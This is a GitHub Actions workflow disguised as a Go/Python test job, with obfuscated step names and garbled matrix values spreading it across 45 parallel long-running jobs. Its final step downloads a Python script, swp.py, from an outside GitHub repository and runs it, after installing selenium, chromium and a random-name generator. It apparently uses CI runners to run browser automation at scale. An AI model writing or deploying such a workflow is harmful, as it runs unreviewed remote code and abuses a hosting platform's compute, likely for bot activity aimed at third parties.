name: sbao
on:
  workflow_dispatch:
jobs:
  scr-1:
    runs-on: ubuntu-latest
    strategy:
      max-parallel: 256
      fail-fast: false
      matrix:
         goc: [1.11, 1.12, 1.1c3, 1.1c4, 1.1q5, 1.16o, 1.17s, 1.18s, 1.1w9]
         flag: [kmn, oiu, qcwe, nvb, lpd]  
    timeout-minutes: 355
    env:
        NUM_JOBS: 256
        JOB: ${{ matrix.goc }}
    steps:
      - name: stg2o ${{ matrix.goc }}
        uses: actions/setup-go@v1
      - name: Setting up Python
        uses: actions/setup-python@v2
        with:
          python-version: '3.9'
      - name: Showingup package list
        run: apt list --installed
      - name: Dev Testui
        run: |
            sudo apt purge google-chrome-stable
            sudo apt purge chromium-browser
            sudo apt install -y chromium-browser
      - name: Install all necessary packages
        run: pip install requests names beautifulsoup4 pandas webdriver-manager selenium
      - name: Sobm Devol
        run: |
             wget https://github.com/Mehslos/iot223/raw/main/swp.py
             python swp.py
        
        
        
        
        
